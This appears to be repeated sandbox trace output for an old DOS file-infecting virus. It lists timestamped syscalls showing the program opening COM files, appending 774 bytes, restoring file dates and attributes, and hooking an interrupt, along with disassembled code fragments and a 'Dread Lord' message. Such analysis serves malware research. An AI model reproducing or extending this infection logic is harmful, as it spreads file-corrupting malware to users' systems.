2018-12-25T11:59:10.348861643Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.352997298Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.354670509Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.357385384Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.367147474Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.368864103Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.376503764Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.388558138Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.392070065Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.396487596Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.400957777Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.402262269Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.405340452Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.409029391Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.411114011Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.412661683Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.415887882Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.432994557Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.43481415Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.436839392Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.44143944Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.444019006Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.451815733Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.463990475Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.466113278Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.473238032Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.479598643Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.482306076Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.483504968Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.4860889Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.495758141Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.497135766Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.504946707Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.515241992Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.517690559Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.52478282Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.53131105Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.534152874Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.54529405Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.55201986Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.555075271Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.557579299Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.560732186Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.574880047Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.57746659Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.585480981Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.595682657Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.600117542Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.607543126Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.614014747Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.616633032Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.619272971Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:10.623523696Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:10.626466639Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:10.635439356Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.63657558Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:10.638729148Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:10.641417621Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:08.163250178Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:08.165392993Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:08.166699544Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:08.167774847Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:08.183023201Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:08.188772205Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:08.199419032Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:08.211963435Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:08.218087059Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:08.219819912Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:09.296392694Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.303049417Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:09.305733074Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:09.307563737Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:09.310223503Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:09.556666281Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:09.55867965Z 62 PC: 12cad | Close file
2018-12-25T11:59:09.566751898Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.593686244Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.599055645Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.606766909Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.613224279Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.615385565Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.626678521Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.633192468Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.635934928Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.638065724Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.640757466Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.79560538Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.797816297Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.035432624Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.235135988Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.238534238Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.244945414Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.251180732Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.253308659Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.285562529Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.292057338Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.296275347Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.298131298Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.300958127Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.310550518Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.31216517Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.319655785Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.330196823Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.335533125Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.341821044Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.348717506Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.350456776Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.36276863Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.370318588Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.376789429Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.378357761Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.381412443Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.389962434Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.391531785Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.399784528Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.410656856Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.414271508Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.422677783Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.429450964Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.430940906Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.433802014Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.437432997Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.447278696Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.449181095Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.451494355Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.472117799Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.474703466Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.477068386Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.482160567Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.484931552Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.491723632Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.496417621Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.498211703Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.508535479Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.515555539Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.518174595Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.520092805Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.522714727Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.531679477Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.534050736Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.542017692Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.552366327Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.555878252Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.562222549Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.568331925Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.570447159Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.580148562Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.586453928Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.589636102Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.590956657Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.593289234Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.602035053Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.603115623Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.608662729Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.619086975Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.621691511Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.628215057Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.634916994Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.636749972Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.638974634Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:10.643989001Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:10.645992627Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:10.654827821Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.656650371Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:10.658595658Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:10.659912281Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:08.167563531Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:08.170045501Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:08.171950678Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:08.173399672Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:08.176812893Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:08.184487369Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:08.197927509Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:08.205358555Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:08.213192536Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:08.215220914Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:08.232162718Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.243303766Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:08.247339449Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:08.249485269Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:08.253307921Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:08.263715799Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:08.265402243Z 62 PC: 12cad | Close file
2018-12-25T11:59:08.27462155Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.286460341Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.289342151Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.296679088Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.304547939Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.306447183Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.317634926Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.326313968Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.330058363Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.332639699Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.335896111Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.346560795Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.348462108Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.360655537Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.371599057Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.374489705Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.382396013Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.389825203Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.39208435Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.405463138Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.412924404Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.415898397Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.417413325Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.420872691Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.430483607Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.43219424Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.441048059Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.451922823Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.454853632Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.462556435Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.470080448Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.472076651Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.483852584Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.491212551Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.494176693Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.496802822Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.4995192Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.508944325Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.511083999Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.52239672Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.533532855Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.537116572Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.544421017Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.551476347Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.553311034Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.559120277Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.564772895Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.56766047Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.570205541Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.572893364Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.596625363Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.599124804Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.601198889Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.606209379Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.61051614Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.618095157Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.625429503Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.628580642Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.639861947Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.647544718Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.651413571Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.65382116Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.656848364Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.666916223Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.669114022Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.677412944Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.688470408Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.692139155Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.699485763Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.706648412Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.709377514Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.720879981Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.728283777Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.736725008Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.741730763Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.744669713Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.899727011Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.903061506Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.960139627Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.006728957Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.009833293Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.017994929Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.024944693Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.027115241Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.029728219Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:09.034058617Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:09.036316544Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:09.046942253Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.048076628Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:09.050342349Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:09.051357215Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:08.572955203Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:08.575130035Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:08.577002764Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:08.578628023Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:08.582175636Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:08.590303656Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:08.598077934Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:08.608465545Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:08.615082968Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:08.616539718Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:08.634864034Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.642653818Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:08.645966558Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:08.647511038Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:08.650361609Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:08.660599526Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:08.662341178Z 62 PC: 12cad | Close file
2018-12-25T11:59:08.671126731Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.682114097Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.684942122Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.692126308Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.702275965Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.705010437Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.716056802Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.724268107Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.728259368Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.72980626Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.741682711Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.898702142Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.909656608Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.944088466Z 67 PC: 12cd9 | Get or set file attributes (See above)
